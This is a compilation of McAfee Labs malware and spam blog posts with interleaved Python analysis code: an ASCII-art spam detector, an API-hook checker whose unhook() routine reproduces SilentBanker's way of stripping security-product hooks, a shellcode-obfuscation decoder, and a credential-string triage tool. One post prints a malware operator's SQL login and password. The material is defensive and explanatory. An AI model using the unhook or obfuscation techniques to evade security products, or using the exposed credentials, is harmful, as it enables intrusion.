One of these techniques is ASCII art, a way of representing an image using only text characters. Such representations first appeared long ago, to work around the inability of early computers and terminals to display graphics.

    Example:

    ______    _____   ______    _       _____    _____     ___
    | ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
    | |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
    |    /   |  __|   |  __/   | |       | |    | |      |  _  |
    | |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
    \_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

The clever part is that each line on its own is just a run of underscores, pipes, and slashes that bears no resemblance to the word “replica,” so a filter that looks at words and tokens sees nothing. Take the whole picture in, though, and our eyes read it as a word. Spammers exploit this gap to slip past spam filters and still deliver their intended message.

Not only words are represented this way; even URLs can be drawn as ASCII art so that the domains escape blacklisting.

The glyphs that make up the art are not limited to punctuation either. Digits, letters, or a mix of both can be used, which makes things even worse for certain spam filters:

    dP""b8  88     db     88     88  dP"Y8
    dP      88    dPYb    88     88 `bo
    Yb      88   dP__Yb   88     88   `Y8b
     YboodP 88  dP""""Yb  88ood8 88  8bodP'

    ASCII art spam example

In the email above the spammer is advertising a pharmacy product without ever spelling its name as a word, yet still gets the message across.
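A filter cannot read the picture the way our eyes do, but it can notice that several consecutive lines contain almost no real words. The following heuristic is an added example (not McAfee’s filter); the two message bodies are constructed, with the spam one reusing the “REPLICA” art shown above, and the thresholds are choices made for this example, not values from the page.

```python
"""Heuristic for the ASCII-art trick described above: look for runs of lines
made mostly of drawing characters, or of tokens that are not words.
Added example, not McAfee's filter; both message bodies are constructed."""
PUNCT = set("_|/\\`'\"-=.,:;()[]{}<>^~*#+")
VOWELS = set("aeiouAEIOU")


def _odd_token(tok: str) -> bool:
    """A token no spell-checker would accept as a word: no vowel at all, or
    drawing characters inside it (trailing sentence punctuation is ignored)."""
    core = tok.strip(".,:;!?")
    if not core:
        return True
    return not (set(core) & VOWELS) or bool(set(core) & PUNCT)


def line_is_art(line: str) -> bool:
    chars = [c for c in line if not c.isspace()]
    if len(chars) < 6:                      # too short to say anything
        return False
    punct_ratio = sum(c in PUNCT for c in chars) / len(chars)
    tokens = line.split()
    odd_ratio = sum(map(_odd_token, tokens)) / len(tokens)
    return punct_ratio >= 0.4 or odd_ratio >= 0.8


def find_art_blocks(text: str, min_run: int = 3) -> list:
    """Return (first, last) line indexes of every run of at least min_run
    consecutive art-like lines."""
    blocks, start = [], None
    for i, line in enumerate(text.splitlines() + [""]):   # sentinel flushes last run
        if line_is_art(line):
            start = i if start is None else start
        else:
            if start is not None and i - start >= min_run:
                blocks.append((start, i - 1))
            start = None
    return blocks


def is_ascii_art_spam(text: str) -> bool:
    return bool(find_art_blocks(text))


# Constructed bodies: the art is the REPLICA banner from the page.
SPAM_BODY = r"""Hi there,
Take a look at our new collection:

______    _____   ______    _       _____    _____     ___
| ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
| |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
|    /   |  __|   |  __/   | |       | |    | |      |  _  |
| |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
\_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

Best watches at the lowest prices.
"""

HAM_BODY = """Hi Bob,
Please find attached the invoice for October.
Let me know if the totals look right.
Thanks,
Alice
"""

if __name__ == "__main__":
    print("spam:", find_art_blocks(SPAM_BODY))   # lines 3..8 are the banner
    print("ham: ", find_art_blocks(HAM_BODY))
```

The run length is what keeps signatures and table separators from triggering: a single line of dashes is harmless, six consecutive lines of `|`, `_` and `\` with no vowels in sight are not. The second spam example on the page (drawn with `d`, `P`, `Y`, `b` and `8`) is caught by the vowel-less-token rule rather than by the punctuation ratio.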

    We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.

    McAfee Labs and the International Spy Museum

    Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor, an exhibit contributor in the new International Spy Museum exhibit “Weapons of Mass Disruption.”

    Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

    Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

    As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

    These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial-of-service attack against a pro-Georgian blogger. Is our air traffic control system protected?”

    The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

    McAfee Labs Releases October Spam Report

    Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

    Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

    The report can be downloaded here.

    Blast from the past: Fresh wave of targeted attacks using PowerPoint

Using social engineering to grab a recipient’s attention and deliver malware is nothing new. The latest trend is to hijack a breaking celebrity story, a disaster, or some other high-profile news event; the threat arrives as email or as poisoned search-engine results that lead to malware. In the past we have come across innumerable incidents, such as Michael Jackson’s death or Benazir Bhutto’s assassination, used as a stage for spreading malware. Lately we have observed an increase in the number of OLE files used in targeted attacks against various high-profile users.

The lure claims to contain information on the Pakistani Air Force and arrives via email as a PowerPoint attachment. When an unsuspecting user with a vulnerable version of PowerPoint opens the document, the vulnerability is exploited and the malicious payload executes.

The vulnerability lies in PowerPoint’s handling of a malformed record, which can be exploited to execute arbitrary code. The shellcode uses the Process Environment Block (PEB) technique to locate the base address of kernel32.dll, walking the list of loaded modules rather than relying on hard-coded addresses, as shown in the figure below.

Once the file is opened in a vulnerable version of PowerPoint, the shellcode decrypts itself and runs the malicious binary.

The malicious PPT file exploits an older vulnerability, which Microsoft patched in bulletin MS06-028. The attack is detected by the current DATs as Exploit-PPT.h, and the dropped malicious executable is detected as BackDoor-EFB.

    Inside the Password-Stealing Business

    Today Avert Labs has published a new research paper, “Inside the Password-Stealing Business: the Who and How of Identity Theft.” With so many financial transactions occurring online today, stealing passwords to banks and other accounts is an irresistible attraction for cybercriminals. Thieves around the world use Trojans and other malware to grab user credentials, which they can resell to their crooked clientele while supporting their own illegal businesses.

    Our report uncovers technical details on the capabilities, level of sophistication, and inner workings of the most infamous contemporary password-stealing malware families such as Zbot, Sinowal, and Steam Stealer. We also discuss the prevalence of such malware, distribution channels, how criminals keep up with the changes banks make to keep transactions secure, and how they exploit today’s economic climate. Offering illegal “work at home” opportunities to desperate job seekers is one way criminals lure the unsuspecting into furthering their illegal activities.

    You’ll find our report here in English and eight more languages.

    Want to peek inside another one of these infamous password thieves? Let’s have a look at SilentBanker.

Our story starts with browser helper objects (BHOs), plug-ins for Internet Explorer. BHOs let developers extend the browser’s functionality without access to the browser’s source code. That doesn’t sound too bad: users aren’t forced to rely on the browser’s developers to implement new features. Even if you’re not a developer, it seems useful to download any extension you like, whether to customize the user interface or to read PDF documents directly in the browser, doesn’t it? Well, yes and no. The answer depends on the trustworthiness of the BHO’s author, of the server you download it from, and even of the DNS server that pointed you there. Unfortunately, not all BHOs are safe: the bad guys are always looking for ways to turn a useful feature into a way to deploy their malware and hunt for usable information such as credentials. SilentBanker is one such password-stealing malware that comes in the form of a BHO.

This is one “helper” you don’t want on your side. Once installed and automatically loaded by the browser, SilentBanker can intercept the communication between your browser and the Internet. The malware is highly configurable and targets online banking users. SilentBanker not only recognizes and monitors online banking activity but can also modify HTML pages to inject additional code or to change the details of a transfer. The data thief acts as a “man in the middle” inside the browser, inspecting and modifying data before it is encrypted and sent to the server, and after it is received from the server and decrypted. Still think you’re secure because of SSL? Not with this freeloader sitting on top of the browser: SSL protects the wire, not the process at either end of it.

    Silentbanker BHO

The screenshot above shows a pseudocode representation of SilentBanker’s malicious core. The code is responsible for detouring the relevant operating system functions to its own malicious routines, and in doing so it effectively blinds security applications such as host intrusion prevention systems that rely on the same hooks. Before installing its own detours, the malware disables any previously installed ones by reading a Windows library’s original code from the hard disk (“read_whole_file”) and mapping it back over the process’s memory (“remove_API_hooks”), rendering security products that rely on user-mode API hooking ineffective.
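The same disk-versus-memory comparison cuts both ways: SilentBanker uses it to find and strip the hooks a security product installed, and an integrity checker uses it to find the hooks SilentBanker installed. The following is an added example, not McAfee’s code and not the malware’s: the library image, its load address, its export table and the three hook targets are all constructed, and only the three common 32-bit x86 detour shapes are decoded.

```python
"""Integrity check for user-mode API detours of the kind SilentBanker installs
and removes. Added example, not McAfee's or the malware's code: the DLL image,
its load address, its export table and the hook targets are constructed."""
import struct

BASE = 0x7C800000                      # hypothetical load address of the DLL
EXPORTS = {                            # hypothetical export name -> RVA
    "InternetConnectA": 0x1000,
    "HttpSendRequestA": 0x1200,
    "CreateFileW":      0x1400,
    "ReadFile":         0x1600,
}
PROLOGUE = bytes.fromhex("8BFF558BEC")  # mov edi,edi; push ebp; mov ebp,esp
PATCH_LEN = 16                          # bytes compared at each entry point


def build_images():
    """Constructed 'disk' image of the DLL's code and the 'memory' image of
    the same code after a BHO planted three detours (targets are made up)."""
    disk = bytearray(b"\xCC" * 0x2000)
    for rva in EXPORTS.values():
        disk[rva:rva + len(PROLOGUE)] = PROLOGUE
    mem = bytearray(disk)
    rva = EXPORTS["InternetConnectA"]            # jmp rel32 -> 0x10000000
    mem[rva:rva + 5] = b"\xE9" + struct.pack("<i", 0x10000000 - (BASE + rva + 5))
    rva = EXPORTS["HttpSendRequestA"]            # jmp dword ptr [0x10002000]
    mem[rva:rva + 6] = b"\xFF\x25" + struct.pack("<I", 0x10002000)
    rva = EXPORTS["CreateFileW"]                 # push 0x10001000; ret
    mem[rva:rva + 6] = b"\x68" + struct.pack("<I", 0x10001000) + b"\xC3"
    return bytes(disk), bytes(mem)


def classify_detour(code: bytes, va: int):
    """Decode the first instruction found at va; returns (kind, target)."""
    if code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (va + 5 + rel) & 0xFFFFFFFF
    if code[:2] == b"\xFF\x25":
        return "jmp [abs32]", struct.unpack_from("<I", code, 2)[0]
    if code[0] == 0x68 and code[5] == 0xC3:
        return "push/ret", struct.unpack_from("<I", code, 1)[0]
    return "modified", None


def detect_inline_hooks(disk: bytes, mem: bytes, exports: dict, base: int) -> dict:
    """Compare each export's entry bytes in memory with the pristine copy read
    from disk; anything that differs is reported with the decoded target."""
    hooks = {}
    for name, rva in exports.items():
        if mem[rva:rva + PATCH_LEN] != disk[rva:rva + PATCH_LEN]:
            hooks[name] = classify_detour(mem[rva:rva + PATCH_LEN], base + rva)
    return hooks


def unhook(disk: bytes, mem: bytes, exports: dict, hooks: dict) -> bytes:
    """Map the original bytes back over the detoured entry points: the same
    move SilentBanker's remove_API_hooks makes against security products."""
    restored = bytearray(mem)
    for name in hooks:
        rva = exports[name]
        restored[rva:rva + PATCH_LEN] = disk[rva:rva + PATCH_LEN]
    return bytes(restored)


DISK_IMAGE, MEM_IMAGE = build_images()

if __name__ == "__main__":
    for name, (kind, target) in detect_inline_hooks(DISK_IMAGE, MEM_IMAGE, EXPORTS, BASE).items():
        print(f"{name:18s} {kind:12s} -> {target:#010x}" if target is not None else name)
```

On a real system the on-disk copy has to be mapped at the same base as the loaded one before the bytes are comparable, since relocations change absolute addresses; the first few bytes of a function almost never contain relocations, which is why checking only the entry point is practical. The lesson of the passage above is the caveat: a product whose protection consists of user-mode hooks can be undone by exactly the `unhook()` step shown here, which is why the malware bothers to read the library from disk first.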

    Be sure to run McAfee VirusScan and Artemis, and McAfee Gateway Anti-Malware within your corporate network to protect your systems from password thieves.

    Private Jet-Set Network Hacked

    We hear a lot about cybercrime events concerning Facebook or Myspace, but do you know ASmallWorld? It is a private international community for the jet-set crowd and culturally influential people.


    Yesterday the French police force (OCLCTIC), accompanied by FBI agents, arrested two French residents. They were suspected of hacking this social-network platform dedicated to the worldwide upper crust. They allegedly attempted to extort US$1 million from the webmasters to not divulge stolen data.

    Two years ago, a paper named “Asmallworld.net: we have hacked the smartest worldwide website” made some noise in France.

    Whether you mingle with the jet set or in other circles, be careful when you share information on your favorite social network platform!

    From Targeted PDF Attack to Backdoor in Five Stages

    As reported by Adobe in July, a Flash vulnerability is being actively exploited by targeted attacks against Adobe Reader. Yes, embedding Flash movies in PDF documents is supported in Adobe Acrobat 9. The idea of allowing Flash movies to be displayed within PDFs isn’t bad if you like your documents spiced up with a bit of interactivity or training videos. From a security perspective, however, this poses yet another attack vector for criminals to take control of vulnerable systems. As history has shown, complexity and feature richness go hand in hand with remotely exploitable vulnerabilities. It is unfortunately no different with this latest PDF feature.

The exploitation of this vulnerability continues. Below are screenshots from one such malicious PDF document, discovered in a targeted attack this week. The file contains several compressed streams and at least two embedded Flash movies. The first embedded Flash movie is clean; the second exploits CVE-2009-1862, a memory corruption that lets the attacker’s code execute. Underneath the compression layer, JavaScript code is embedded in the PDF document. This code fills heap memory with the attacker’s shellcode (a heap spray) so that the corrupted control flow lands on it. Apart from the PDF acting as an additional obfuscation layer around the exploit, the JavaScript code, once unpacked, contains another function that attempts to evade detection.

    jscodearrows2

    The FileInsight screenshot above shows the JavaScript function “lololo(),” which deobfuscates a string holding the actual malicious payload at run time. The function simply replaces any occurrence of the substring “XX” found in “payLoadCode” with the substring “%u,” converting the previously obfuscated string into one that can be “unescaped” to x86 shellcode. Its purpose is to prevent security products from detecting escaped strings that might be an indicator for an exploit. To find out about the payload’s final purpose, we load the final unescaped string into a disassembler:

    shellcode

This shellcode decodes a certain area within the PDF document using an XOR with the key 0xF4, writes the decoded data to a file, and finally executes it by calling the WinExec() API. The resulting file is a UPX-packed executable with an additional custom packer layer on top, which complicates static analysis of the binary (proactively blocked as “BehavesLike.Win32.ModifiedUPX.J” by McAfee Gateway Anti-Malware). To analyze the executable it first needs to be freed from its packer layers. What we see then is that the executable drops the DLL mscvr.dll to disk with the “hidden” attribute set, so it is not visible in Windows Explorer with default settings. Before the malware injects this DLL into the memory of the running explorer.exe process, it infects the network diagnostic utility netstat.exe on disk so that the utility loads msvcr.dll each time it runs. The DLL contains a configuration file embedded as a resource, which tells the netstat utility not to display the connections to certain Chinese hostnames that the DLL is about to phone home to.
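Both decoding steps described above are mechanical, and an analyst can reproduce them offline without running the exploit. The following is an added example, not McAfee’s tooling and not the attacker’s JavaScript: it performs the “XX” to “%u” substitution that lololo() does, models what unescape() leaves in memory, and then scans a PDF for the XOR-0xF4 executable by looking for a decoded MZ/PE pair. The sample PDF bytes, the stub shellcode and the stub PE image are constructed; only the 0xF4 key and the substitution come from the page.

```python
"""The two decoding steps described above, reproduced as an added example
(not McAfee's tooling, not the attacker's code): the lololo()-style
"XX" -> "%u" substitution followed by a JavaScript-style unescape(), and
the XOR-0xF4 recovery of the executable embedded in the PDF. The sample
PDF, the stub shellcode and the stub PE image are constructed."""


def js_unescape_to_bytes(s: str) -> bytes:
    """Model JavaScript's unescape() the way a heap spray sees it: every
    resulting UTF-16 code unit becomes two little-endian bytes in memory."""
    units, i = [], 0
    while i < len(s):
        if s.startswith("%u", i) and len(s) >= i + 6:
            units.append(int(s[i + 2:i + 6], 16)); i += 6
        elif s[i] == "%" and len(s) >= i + 3:
            units.append(int(s[i + 1:i + 3], 16)); i += 3
        else:
            units.append(ord(s[i])); i += 1
    return b"".join(u.to_bytes(2, "little") for u in units)


def deobfuscate_payload(payload_code: str) -> bytes:
    """What the PDF's lololo() does: put back the "%u" escapes that were
    replaced by "XX" so that no escaped string is visible to a scanner."""
    return js_unescape_to_bytes(payload_code.replace("XX", "%u"))


def obfuscate_payload(shellcode: bytes) -> str:
    """Inverse transform, used here only to build the constructed sample."""
    if len(shellcode) % 2:
        shellcode += b"\x90"                     # pad to whole code units
    return "".join("XX%04x" % int.from_bytes(shellcode[i:i + 2], "little")
                   for i in range(0, len(shellcode), 2))


def xor_bytes(blob: bytes, key: int = 0xF4) -> bytes:
    return bytes(b ^ key for b in blob)


def find_xored_pe(data: bytes, key: int = 0xF4) -> list:
    """Offsets in data where an XOR-encoded PE image starts: the 'MZ' magic
    must decode, and e_lfanew must point at a decoded 'PE\\0\\0' signature."""
    marker = xor_bytes(b"MZ", key)
    hits, pos = [], data.find(marker)
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = int.from_bytes(xor_bytes(data[pos + 0x3C:pos + 0x40], key), "little")
            sig = pos + e_lfanew
            if sig + 4 <= len(data) and xor_bytes(data[sig:sig + 4], key) == b"PE\x00\x00":
                hits.append(pos)
        pos = data.find(marker, pos + 1)
    return hits


# --- constructed sample ------------------------------------------------------
STUB_SHELLCODE = bytes.fromhex("9090eb0e")   # nop; nop; jmp short +0x0e (made-up stub)
STUB_PE = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00"
PDF_PREFIX = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\nstream\n"
SAMPLE_PDF = PDF_PREFIX + xor_bytes(STUB_PE) + b"\nendstream\n%%EOF\n"
EXE_OFFSET = len(PDF_PREFIX)

if __name__ == "__main__":
    print("shellcode:", deobfuscate_payload(obfuscate_payload(STUB_SHELLCODE)).hex())
    for off in find_xored_pe(SAMPLE_PDF):
        exe = xor_bytes(SAMPLE_PDF[off:off + len(STUB_PE)])
        print(f"XOR-0xF4 PE at offset {off:#x}, signature {exe[0x40:0x44]!r}")
```

Two details matter in practice. `%u` escapes produce 16-bit code units, so a scanner that unescapes into 8-bit bytes will misread the shellcode; and searching for the encoded `MZ` alone produces false positives in any large file, which is why the scan also follows e_lfanew to the encoded `PE\0\0` signature before reporting a hit. With the key unknown, the same scan can simply be repeated for all 256 single-byte keys.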

    netstatinfection

The DLL component is aware of several desktop security products and attempts to terminate them before it collects private data, such as information about the operating system, CPU speed and type, the list of available drives, the logged-in user’s account name, and credentials for several programs (such as MSN Messenger). What is really bad about this piece of malware is its backdoor component. The code connects back to its creators and waits for instructions on what to do next. Besides common backdoor functionality such as uploading, downloading, and moving files, which allows data theft and modification, the backdoor also has a command that instructs the malware to spread to removable drives, as a worm does. That behavior can infect an entire corporate network, as we all learned from the Conficker incident. McAfee Gateway Anti-Malware protects against this targeted attack, proactively blocking the malicious PDF document as “BehavesLike.PDF.CodeExec.EPEO.”

    Chinese Pharmacy Spam and Our Monthly Spam Report

    The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

    The report reveals the truth behind the “Chinese pharmacy” spam:

    • “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
    • Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
    • “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
    • If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

    Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

    • The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
    • The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
• Brazil, Turkey, and India were the top three countries hosting the infected machines that spread the August 6 spam campaign in conjunction with the DDoS attack

    Check out the full report here.

    Q2 Threats Report Released–It’s All About Botnets and Spam

    Today we released our Q2 Threats Report. Some old trends have continued. Some new trends and threats have been established, and some old “friends” have even outdone themselves. Spam volumes have increased 141 percent since March, continuing the longest ever streak of increasing spam volumes. We also highlight the dramatic expansion of botnets and the threat from AutoRun malware.

    More than 14 million computers have been enslaved by cybercriminal botnets, a 16 percent increase over last quarter’s rise. The report confirmed our first-quarter prediction that the surge in botnet growth would send spam levels to new heights, surpassing their previous peak in October 2008 before the takedown of the spam-hosting ISP McColo.

    Our researchers also found that over the course of 30 days AutoRun malware had troubled more than 27 million files. AutoRun malware, which exploits Windows’ AutoRun capabilities, does not require any user clicks to activate, and is most often spread through portable USB and storage devices. The rate of detection surpasses even that of the infamous Conficker worm by 400 percent, making AutoRun one of the most prevalent pieces of malware in the world.

    Some of the other areas we cover and discuss:

    Cybercrime as a Service
    As the number of botnets continues to grow, malware writers have begun to offer malicious software as a service to those who control these bots. By exchanging or selling resources, cybercriminals distribute new malware to wider audiences instantaneously. Programs like Zeus–an easy-to-use Trojan creation tool–continue to make the creation and management of malware even easier.

    Cybercriminals Target Twitter, Social Networks
    Twitter’s growth in popularity has made it a new target for cybercriminals in the last three months. Malware like the “Mikeey” worm and new variations of the Koobface Trojan attack users through tweets and abbreviated URLs. Spam Twitter accounts are becoming increasingly prevalent. Twitter administrative accounts have also been hacked on multiple occasions, giving cybercriminals access to the private accounts of celebrities and politicians, such as Britney Spears and Barack Obama and even allowing for the publication of sensitive internal strategy documents on the Web. Facebook and MySpace remain strong attack vectors for cybercriminals. In May, spam messages on social networks pointed users to more than 4,000 new Koobface binaries!

    To view the McAfee Q2 Threats Report, go here.

    Malware Is Their Business…and Business Is Good!

    I cribbed the title from Megadeth–I admit it. However, when looking at this year’s growth in malware it seems disturbingly appropriate. Global economic downturn or not, malware production continues at a record-setting pace because this is how many cybercriminals make their money. (Malware long ago stopped being about fun and bragging.)

    We at Avert Labs have seen almost as much unique malware in the first half of 2009 as we did in ALL of 2008. This is quite something when you consider that in 2008 we saw the greatest ever growth in malware:

    Unique Malware Growth

    For you math and data junkies that comes out to an average of 200,000 unique pieces monthly or more than 6,000 daily. Yep–that was over 6,000 on a daily basis. Bear in mind these are malware we consider unique (something we had to write a driver for) and does not count all the other malware we detect generically or heuristically, but we will save that discussion for another post. When you add in the generic and heuristic detections the number becomes truly mind boggling.

    Even when compared to the first half of 2008, the growth is almost three times what it was. The sheer growth is even challenging Moore’s Law a bit.

    Half Year Malware Comparison

    Our latest whitepaper, Financial Fraud and Internet Banking: Threats and Countermeasures, explains how much of this malware can be used to scam and steal from users. The new whitepaper was written by one of our French researchers, François Paget. It can be found here.

    There are many reasons why malware continues to grow, but it is mainly a criminal’s game at this point. Malware steals data. The people who write and distribute malware are criminals. Pretty plain and simple to me. The tools and code are readily available and that will certainly not change, but (and this is important) it is also definitely NOT doomsday. Staying educated and updated goes a long way toward safe computing.

    Sex the Bait in Mass Orkut Compromise

    With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish out personal information, as well as MySpace scams and Facebook spams.

    With more than 15 percent of the traffic from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not so tech-savvy users on Orkut. They have updated the user profiles of several thousands of compromised Orkut accounts, which now link to various phished websites. These lure visiting users into divulging their personal information.

    Various phished websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousands of Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.


    We have observed scores of websites being used in this phishing attack. Here are a few of them:

    • http://orkutsexlogi[blocked].tk
    • http://s3x[blocked].kilu.de
    • http://orkutst[blocked].tk
    • http://album[blocked].kilu.de
    • http://priya[blocked].freehostia.com

    If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

    More Password-Theft Shenanigans

    Recently, my colleague Pedro Bueno wrote about “dumb” malware authors hardcoding their login credentials into their password-stealing Trojan. The malware he referenced, PWS-Banker.gen.i, ostensibly came from Brazil. Today, we found the same negligence in a similar piece of Chinese malware detected as PWS-Banker.gen.de.

    When run, the password-stealing Trojan queries for the infected host’s IP address using three web-based IP address-lookup services. It then makes a SQL query over TCP to post stolen passwords to a server in China. This is a part of the actual SQL query to log into the malicious SQL server:

    Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;User ID=mengmeng;[REMOVED]

    mengmeng has been up to no good and, what’s more, was careless enough to leave his login credentials in the open. Please keep your DATs updated to stay secure!

    Dumb Malware Authors Cause More Damage Than Smart Ones

    I don’t really know which is worse: a dumb or a smart malware writer.

    Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

    While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

    Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

    Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

    What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.
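Both this post and the follow-up on PWS-Banker.gen.de turn on the same triage signal: an ADO/OLE DB connection string with a user and password baked into the binary. The helper below pulls such strings out of a strings-style dump and reports them without echoing the password; it is an added example, not McAfee code, and the sample dump, host, user and password values are constructed placeholders.

```python
"""Triage helper for hard-coded OLE DB connection strings in a sample's
printable strings. Added example, not McAfee code: the connection-string
layout is the one shown in the two posts, while the dump below is constructed
and its host, user and password values are placeholders."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# An ADO/OLE DB connection string is a ';'-separated list of key=value pairs;
# keys are case-insensitive and may contain spaces ("User ID", "Data Source").
# Match from the Provider= key to the end of the printable run it sits in.
_CONN_RE = re.compile(r"Provider=[^\r\n\x00]+", re.IGNORECASE)

# Alternative key spellings ADO accepts for the fields we care about.
_USER_KEYS = ("user id", "uid")
_PASSWORD_KEYS = ("password", "pwd")
_HOST_KEYS = ("data source", "server", "address")


@dataclass
class ConnFinding:
    provider: str
    user: Optional[str]
    host: Optional[str]
    password_present: bool
    raw: str

    def summary(self) -> str:
        """One-line report for the case notes that never echoes the password."""
        state = "embedded" if self.password_present else "absent"
        return (f"provider={self.provider} user={self.user or '?'} "
                f"host={self.host or '?'} password={state}")


def parse_connection_string(conn: str) -> Dict[str, str]:
    """Split key=value pairs into a dict with lower-cased keys.
    A token without '=' (such as a truncation marker) is skipped."""
    fields: Dict[str, str] = {}
    for part in conn.split(";"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        fields[key.strip().lower()] = value.strip()
    return fields


def _first(fields: Dict[str, str], keys: Iterable[str]) -> Optional[str]:
    """First non-empty value among alternative key spellings (empty counts as absent)."""
    for key in keys:
        if fields.get(key):
            return fields[key]
    return None


def find_connection_strings(text: str) -> List[ConnFinding]:
    """Locate every connection string in a strings dump and describe it."""
    findings = []
    for match in _CONN_RE.finditer(text):
        fields = parse_connection_string(match.group(0))
        findings.append(ConnFinding(
            provider=fields.get("provider", ""),
            user=_first(fields, _USER_KEYS),
            host=_first(fields, _HOST_KEYS),
            password_present=_first(fields, _PASSWORD_KEYS) is not None,
            raw=match.group(0),
        ))
    return findings


def embedded_credentials(text: str) -> List[ConnFinding]:
    """The signal both posts describe: a user *and* a password baked into the binary."""
    return [f for f in find_connection_strings(text)
            if f.user and f.password_present]


# Constructed dump standing in for `strings sample.exe` output. The first two
# entries mirror the layout quoted in the posts; every value is a placeholder.
SAMPLE_STRINGS = r"""
GetProcAddress
Provider=SQLOLEDB.1;Password=PLACEHOLDER_PW;Persist Security Info=True;User ID=example_user;Initial Catalog=example_db;Data Source=sql.example.invalid;Packet Size=10000
Provider=SQLOLEDB.1;Password=PLACEHOLDER_PW2;Persist Security Info=True;User ID=example_user2;[REMOVED]
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=C:\local.mdb
http://checkip.example.invalid/
"""

if __name__ == "__main__":
    for finding in embedded_credentials(SAMPLE_STRINGS):
        print(finding.summary())
```

The third connection string in the sample (a local Jet database with no credentials) is deliberately left unflagged to show the check is about embedded credentials, not the mere presence of a connection string.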

    Yes, it is just another password-stealing Trojan. No need to get too excited. :) And, yes, we already detect this malware–as PWS-Banker.gen.i.

    ATM Malware Makes Withdrawals in Russia

    We frequently encounter password stealers and backdoors in computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see these malware directly implemented in banks’ automated teller machines. In these cases, Trojans have to be installed by people who have physical access to the machines. Data collecting and malware removal would need yet another visit or visits. It should seem obvious that such malware installation requires a high level of “cooperation” from the bank staff.

